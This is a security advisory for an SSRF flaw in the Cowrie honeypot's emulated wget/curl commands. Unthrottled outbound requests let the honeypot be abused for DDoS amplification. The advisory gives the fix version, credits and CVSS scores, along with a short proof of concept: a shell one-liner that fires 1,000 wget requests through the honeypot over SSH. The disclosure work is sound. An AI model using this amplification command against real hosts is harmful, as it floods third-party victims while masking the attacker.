Cowrie has a SSRF vulnerability in wget/curl emulation enabling DDoS amplification

Description

Summary

A Server-Side Request Forgery (SSRF) vulnerability in Cowrie's emulated shell mode allows unauthenticated attackers to abuse the honeypot as an amplification vector for HTTP-based denial-of-service attacks against arbitrary third-party hosts.

Details

When Cowrie operates in emulated shell mode (the default configuration), it basically emulates common Linux commands. The wget and curl command emulations actually perform real outbound HTTP requests to the destinations specified by the attacker, as this functionality is intended to allow Cowrie to save downloaded files for later inspection.

An attacker who connects to the honeypot via SSH or Telnet can repeatedly invoke these commands targeting a victim host. Since there was no rate limiting mechanism in place, the attacker could generate unlimited outbound HTTP traffic toward the victim. The requests originate from the honeypot's IP address, effectively masking the attacker's identity and turning the honeypot into an unwitting participant in distributed denial-of-service (DDoS) attacks.

This vulnerability was observed being actively exploited in the wild.

Acknowledgements
This vulnerability was investigated by Abraham Gebrehiwot and Filippo Lauria, with additional contributions from Michele Castellaneta, Claudio Porta and Sara Afzal. All researchers are affiliated with the Institute of Informatics and Telematics (IIT), Italian National Research Council (CNR).

Fix
This issue has been fixed in version 2.9.0 via PR #2800, which introduces a rate limiting mechanism for outbound requests in command emulations such as wget and curl.

PoC

This is a rudimentary proof of concept demonstrating the amplification potential of this vulnerability.

Setup:
- Victim machine (192.168.1.30): runs a simple HTTP server
- Attacker machine (192.168.1.20): initiates the attack
- Cowrie honeypot (192.168.1.10): configured in emulated shell mode with SSH access (credentials: test:test)

On the victim machine, start an HTTP server:

sudo python3 -m http.server 80

On the attacker machine, execute:

PAYLOAD=$(for i in {1..100}; do echo -n 'wget -q http://192.168.1.30;'; done) && \
for i in {1..10}; do sshpass -p test ssh [email protected] "$PAYLOAD"; done

This command builds a PAYLOAD consisting of 100 concatenated wget commands, then executes it 10 times via SSH, resulting in 1,000 HTTP requests toward the victim from a single attack script. The amplification factor can be arbitrarily increased by adjusting these values, bounded by technical limitations such as argument length, buffer sizes, etc.

Result: The victim's HTTP server logs show 1,000 requests originating exclusively from the honeypot's IP address (192.168.1.10), received within approximately 5 seconds (truncated for brevity):

192.168.1.10 - - [11/Dec/2025 14:33:03] "GET / HTTP/1.1" 200 -
192.168.1.10 - - [11/Dec/2025 14:33:03] "GET / HTTP/1.1" 200 -
192.168.1.10 - - [11/Dec/2025 14:33:03] "GET / HTTP/1.1" 200 -
...
192.168.1.10 - - [11/Dec/2025 14:33:08] "GET / HTTP/1.1" 200 -
192.168.1.10 - - [11/Dec/2025 14:33:08] "GET / HTTP/1.1" 200 -
192.168.1.10 - - [11/Dec/2025 14:33:08] "GET / HTTP/1.1" 200 -

Notice that the attacker's IP (192.168.1.20) never appears in the victim's logs, demonstrating how the honeypot masks the attacker's identity.

Impact

This is a Server-Side Request Forgery (SSRF) vulnerability that enables abuse of Cowrie honeypots as DDoS amplification nodes.

Who is impacted: Any organization running Cowrie in emulated shell mode (the default configuration) with versions prior to 2.9.0.

Consequences:
- Third-party victims receive unwanted HTTP traffic from the honeypot's IP address
- Attackers can mask their identity behind the honeypot's IP
- Honeypot operators may face abuse complaints or have their infrastructure blocklisted
- Network resources of the honeypot host are consumed

Basic information

Type
reviewed
Severity
medium
Advisory on GitHub
Open advisory ↗
Repository advisory
Open repository advisory ↗
Source code
Browse source ↗
Published (advisory)
2025-12-20 17:42:07 UTC
Updated
2026-02-23 15:19:20 UTC
GitHub reviewed
2025-12-20 17:42:07 UTC
NVD published
2025-12-31

EPSS Score

Score Percentile
0.19% 41.09%

CVSS Scores

Base score Version Severity Vector
8.3 3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L Click to expand
Attack vector (AV:N)
Could be attacked over the internet or any normal routed network—not just someone sitting at the machine.
Attack complexity (AC:L)
Once they can reach the bug, pulling it off is straightforward—no weird race conditions or rare setup.
Privileges required (PR:N)
No account or special rights needed—anonymous or random user is enough.
User interaction (UI:N)
Nobody has to click “OK” or open a trap file; it can work without a victim helping.
Scope (S:C)
Breaking this can reach past the original component and bite other resources—bigger blast radius.
Confidentiality (C:L)
Some sensitive info could get out, but not a total data dump.
Integrity (I:L)
Attackers could change some data, but it’s limited—not everything goes.
Availability (A:L)
Might cause slowdowns, glitches, or partial disruption—not a full brick.
6.9 4.0
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:L Click to expand
Attack vector (AV:N)
Could be attacked over the internet or any normal routed network.
Attack complexity (AC:L)
Exploitation conditions are straightforward and stable.
Attack requirements (AT:N)
No additional preconditions are required beyond normal reachability.
Privileges required (PR:N)
No privileges are required.
User interaction (UI:N)
No user interaction is required.
Vulnerable system confidentiality impact (VC:N)
No confidentiality impact on the vulnerable system.
Vulnerable system integrity impact (VI:N)
No integrity impact on the vulnerable system.
Vulnerable system availability impact (VA:L)
Limited availability impact on the vulnerable system.
Subsequent system confidentiality impact (SC:N)
No confidentiality impact on subsequent systems.
Subsequent system integrity impact (SI:N)
No integrity impact on subsequent systems.
Subsequent system availability impact (SA:L)
Limited availability impact on subsequent systems.

Identifiers

CWEs

CWE id Name
CWE-918 Server-Side Request Forgery (SSRF)

Credits

  • filippolauria (reporter)
  • mcastellaneta (other)
  • claudiopo82 (other)
  • saraafzal467 (other)

Affected packages (1)

Vulnerable version ranges and first patched releases as published by GitHub.

Ecosystem Package Vulnerable range First patched Vulnerable functions
pip cowrie < 2.9.0 2.9.0

References

cvelogic Threat Intelligence